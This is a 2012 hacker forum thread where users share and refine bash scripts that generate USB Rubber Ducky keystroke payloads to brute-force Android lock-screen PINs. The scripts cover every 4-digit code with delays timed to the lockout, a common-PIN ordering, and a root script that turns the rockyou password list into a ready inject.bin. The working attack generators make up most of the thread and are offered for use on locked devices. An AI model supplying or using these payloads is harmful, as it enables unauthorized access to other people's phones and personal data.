Darren Kitchen Posted December 6, 2012 Share Posted December 6, 2012 I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected. I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that. With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee. Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-) echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt[/CODE] 7 Quote Link to comment Share on other sites More sharing options...
Pwnd2Pwnr Posted December 6, 2012 Share Posted December 6, 2012 Darren Kitchen... once again... kicks ass and is like, "Whatevs". Keep on rockin @Darren! 1 Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted December 6, 2012 Share Posted December 6, 2012 I sent you a message elsewhere, but figured it would fit here as well. Does this require ADB to be enabled? Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted December 7, 2012 Author Share Posted December 7, 2012 No, this doesn't require anything special on the Android side. All of these android payloads have been tested on a stock Galaxy Nexus running the latest 4.2.1 firmware. I have tested many other devices and they have all worked well with the ducky. It seems Android loved HID as much as any other computer. For that matter, iPhone should be the same - just requires the right 30-pin to USB adapter. 1 Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted December 7, 2012 Share Posted December 7, 2012 No, this doesn't require anything special on the Android side. All of these android payloads have been tested on a stock Galaxy Nexus running the latest 4.2.1 firmware. I have tested many other devices and they have all worked well with the ducky. It seems Android loved HID as much as any other computer. For that matter, iPhone should be the same - just requires the right 30-pin to USB adapter. Good to know, can't wait for your final version. Need to pick myself up a new and improved ducky (currently only have the dev teensy, I was one of the lucky ones.) next week when I get paid... along with other hakshop goodies :D. Quote Link to comment Share on other sites More sharing options...
silver-moonshine Posted December 7, 2012 Share Posted December 7, 2012 would this not also be effective on the new windows 8 , when people have the option to change their signin password with a pin ? :) Quote Link to comment Share on other sites More sharing options...
shoeless89 Posted December 9, 2012 Share Posted December 9, 2012 I don't have my SD card reader with me to update my payloads for my ducky right now but can't wait to give it a shot! 1 Quote Link to comment Share on other sites More sharing options...
overwraith Posted December 9, 2012 Share Posted December 9, 2012 (edited) I am running CYGWIN and am having some problems with the script. Can anyone see what is happening with the script? Here is my command line. C:\Users\UserName\Desktop>echo DELAY 5000 > android_brute-force_0000-9999.txt; ec ho {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$ /\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTE R\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt C:\Users\UserName\Desktop>dir android* Volume in drive C has no label. Volume Serial Number is 2499-C7D7 Directory of C:\Users\UserName\Desktop 07/07/2012 01:03 AM 165 Android Paths.txt 08/30/2012 08:00 PM 50 Android SDK Path.txt 12/09/2012 02:26 PM 63 android_brute-force_0000-9999.txt 3 File(s) 278 bytes 0 Dir(s) 831,818,436,608 bytes free C:\Users\UserName\Desktop>type android_brute-force_0000-9999.txt DELAY 5000 ; echo {0000..9999} STRING DELAY 1000 ENTER ENTER C:\Users\UserName\Desktop> Edited December 9, 2012 by overwraith Quote Link to comment Share on other sites More sharing options...
shoeless89 Posted December 11, 2012 Share Posted December 11, 2012 So when I plug the Rubber Ducky into my phone is doesn't do anything at all. The light doesn't light up or anything. But When I plug it into my computer I see the inject.bin file and the led's on the duck lights up. Any ideas? Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted December 12, 2012 Share Posted December 12, 2012 Are you sure that your phone supports a USB keyboard? Quote Link to comment Share on other sites More sharing options...
no42 Posted December 12, 2012 Share Posted December 12, 2012 To adapt Darren's simple script to generate android.txt on OSX, you need Mac Ports installed and you need to install gsed (gnu-sed), as gnu-sed is slightly different to OSX's default bsd-sed. port install gsed[/CODE]then:[CODE]echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | gsed '0~5 s/$/\nWAIT/g' | gsed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | gsed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt[/CODE]Not sure whats going wrong with cygwin? Quote Link to comment Share on other sites More sharing options...
keb0x80 Posted December 12, 2012 Share Posted December 12, 2012 I created a script to generate pretty much the same output using only bash loops/conditions #!/bin/bashcount=0echo "DELAY 5000"for pin in {0000..9999}do count=$((count+1)) echo "STRING $pin" # After every other pin, do this if [ $((count % 2)) -eq 0 ]; then echo "DELAY 1000" echo "ENTER" echo "ENTER" fi # After 5 pins, do this if [ $((count % 5)) -eq 0 ]; then for (( delay=0 ; $((delay < 4)) ; delay=$((delay+1)) )) do echo "DELAY 5000" echo "ENTER" done fidone[/CODE] Quote Link to comment Share on other sites More sharing options...
shoeless89 Posted December 13, 2012 Share Posted December 13, 2012 Are you sure that your phone supports a USB keyboard? No I am not ;/ Quote Link to comment Share on other sites More sharing options...
Totu Posted December 13, 2012 Share Posted December 13, 2012 You probably could get a huge performance boost out of this method if you tweaked your PIN list a little. Most common PINs would be any combinations with all same numbers like 0000, 1111, 2222, 3333, etc. So you should probably try thous first then things like 1234, 1212, 4321, 6969. Because people like patterns and people are lazy and don't wan't to remember more than two numbers. Just my two cents. 1 3 Quote Link to comment Share on other sites More sharing options...
Kag Posted December 13, 2012 Share Posted December 13, 2012 (edited) It is kind of odd they didn't lock down the device after a certain number of tries as pattern lock does that after 20 tries. And once it gets locked down you'll need your gmail password to unlock. (Which also sort of fails as well cause reboot resets the counter) Edited December 13, 2012 by Kag Quote Link to comment Share on other sites More sharing options...
iamnoxtras Posted December 13, 2012 Share Posted December 13, 2012 (edited) Hello everybody, I must say that I am surprised that noone (only Totu) suggested to use a handcrafted dictionary. I mean, you all probably read the article on CC PIN security. I think if you try to bruteforce your way into a device with PIN you should really use that list, instead of a generated one. Here is the study? http://www.datagenet...september32012/ and here are the first 10 pins I would try: 1234 1111 0000 1212 7777 1004 2000 4444 2222 6969 1 in 4 chance of hacking the device in under a minute! What do you say? Edited December 13, 2012 by iamnoxtras 1 Quote Link to comment Share on other sites More sharing options...
Pwnd2Pwnr Posted December 13, 2012 Share Posted December 13, 2012 My password is.... 1 2 4 4 5 The same one on my luggage... 1 Quote Link to comment Share on other sites More sharing options...
overwraith Posted December 14, 2012 Share Posted December 14, 2012 I figured out what the problem was... I should have figured that the Linux foo would not work on the Windows command line even if I did put the CYGWIN bin directory in my path variable. Have to use the CYGWIN prompt provided with their software. Quote Link to comment Share on other sites More sharing options...
CaptainHooligan Posted December 14, 2012 Share Posted December 14, 2012 (edited) Another good thing to do would be to download the rockyou password list from skullsecurity. Take like the top 5000 out of it as it is already sorted by most frequently used to least. If a device is encrypted this will save you tons of time as there is no 5 password then wait limiter. ** Edit ** Here is a script that will grab rockyou.txt and create a payload for you in linux. Right now it does wait 30 seconds after every 5 passwords. I'm adding an option to not wait 30 seconds as if attacking the encryption logon screen. #!/bin/bashclearecho -e "========================================================"echo -e " This script downloads the rockyou password list"echo -e " then takes the top 5000 passwords and generates"echo -e " an Android brute forcer."echo -e "========================================================"echo -e " You need to have duckencode.jar installed as well"echo -e " as bzip2 and wget."echo -e "========================================================"echo -e " This script is licensed under the GPLv3 and is"echo -e " currently maintained by James Luther (CaptainHooligan)"echo -e "========================================================"echo ""echo ""WHOAMI=`id | sed -e 's/(.*//'`if [ "$WHOAMI" != "uid=0" ] ; then echo "Sorry, you need super user access to run this script." exit 1fiecho -e "Verifying prerequisites are installed ... "echo ""duckdir=`find / -name duckencode.jar`if [ -z "$duckdir" ] ; thenecho "Duckencode.jar not found on system. Please verify you have this installed."exit 1elseecho "Duckencode.jar prerequisite met."fiduckinpath=`which duckencode.jar`if [ -z "$duckinpath" ] ; thenPATH=$PATH:$duckdirfibundir=`find / -name bzip2`if [ -z "$bundir" ] ; thenecho "Bzip2 not found on system. Please verify you have this installed."exit 1elseecho "Bzip2 prerequisite met."fibuninpath=`which bzip2`if [ -z "$buninpath" ] ; thenPATH=$PATH:$bundirfiwgetdir=`find / -name wget`if [ -z "$wgetdir" ] ; thenecho "Wget not found on system. Please verify you have this installed."exit 1elseecho "Wget prerequisite met."fiwgetinpath=`which wget`if [ -z "$wgetinpath" ] ; thenPATH=$PATH:$wgetdirfiecho ""echo ""#echo -e "Which do you want to attack?"#echo -e " 1. Encryption Screen"#echo -e " 2. Password Screen"#read answer#case answer# 1)echo -e "Verify connection to internet and press [Enter]."readecho ""echo ""echo -e "Downloading rockyou password list. This can take some time ..."echo ""echo ""wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2bunzip rockyou.txt.bz2echo ""echo ""echo -e "Creating rock-android.txt file ... "echo ""echo ""echo DELAY 5000 > rock-android.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> rock-android.txtecho -e "rock-android.txt created!"ls -lart rock-android.txtecho ""echo ""echo -e "Creating inject.bin file ... "java -jar duckencode.jar -i rock-android.txtecho ""echo ""echo -e "Inject.bin created. Copy this over to your sdcard and enjoy!"ls -lart inject.bin[/CODE] Edited December 14, 2012 by CaptainHooligan 1 Quote Link to comment Share on other sites More sharing options...
barry99705 Posted December 26, 2012 Share Posted December 26, 2012 My pin is actually a really old phone number, none of mine, but one I had memorized. It's also not one of the multiple same number combos. I'd think most people would go this route, the lazy ones would probably use their own number... Quote Link to comment Share on other sites More sharing options...
DrDinosaur Posted December 27, 2012 Share Posted December 27, 2012 Will it continue to go deep into the brute forcing even with a different pin lock screen? For example the Galaxy S3 might have a different login screen for PINs than the Nexus because of touchwiz. Does that affect the payload at all? Would it press the wrong numbers or keys because of a different key layout? Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted December 27, 2012 Share Posted December 27, 2012 It's not based on the layout of the interface. The payload is based on the manual entry of the pass code by the keyboard, ie literally pressing 1-2-3-4. As long as the new models support USB keyboard by default, then I can't see any reason why it wouldn't work. 1 Quote Link to comment Share on other sites More sharing options...
JDale Posted December 28, 2012 Share Posted December 28, 2012 Hi All, I have a Motorla ME863 cell phone and after a few xmas drinks was a pratt and changed my 4 digit number pass code ....and yup you guessed it ...promptly forgot the damm thing. Is there anyone in the UK southeast / Berks/Bucks/ London area that can help me fix without having to do a factory reset ? Many thanks in advance for all and any help Rgds JD Quote Link to comment Share on other sites More sharing options...
JDale Posted December 28, 2012 Share Posted December 28, 2012 Just to add, it is the Chinese version (purchased august 2012) and not the usa version so the gmail backdoor does not work, as china blocks gmail, facebook etc Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted December 29, 2012 Share Posted December 29, 2012 If it has USB keyboard support, get yourself a ducky or a Teensy board, and brute-force it. If it doesn't support USB keyboard, then you're kinda stuck. (As far as I know, anyway...) Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.